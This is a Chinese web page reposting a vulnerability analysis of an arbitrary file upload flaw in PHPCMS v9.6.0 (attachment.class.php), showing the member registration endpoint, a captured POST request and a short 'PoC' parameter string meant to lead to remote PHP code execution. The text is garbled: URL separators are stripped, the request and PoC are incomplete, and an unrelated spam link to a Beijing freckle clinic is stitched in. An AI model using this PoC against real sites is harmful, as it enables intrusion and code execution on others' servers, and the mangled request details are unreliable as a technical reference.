所在的位置: php >> php市场 >> PHPCMSv960前端任意文件

PHPCMSv960前端任意文件

北京的最好雀斑医院 http://baijiahao.baidu.com/s?id=1713926560332244852&wfr=spider&for=pc

概述

PHPCMSv9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

漏洞分析

前台注册页面处

/index.php?m=memberc=indexa=registersiteid=1

路径:/phpcms/modules/member/index.php

注册处抓包:

POST/phpcms/install_package/index.php?m=memberc=indexa=registersiteid=1HTTP/1.1siteid=1modelid=10username=password=pwdconfirm=email=%40qq.   11——>content内容

PoC:

siteid=1modelid=11username=NSdemonpassword=NSdemonpwdconfirm=email=NSdemon

qq.


转载请注明:http://www.aierlanlan.com/rzdk/841.html

  • 上一篇文章:
  •   
  • 下一篇文章: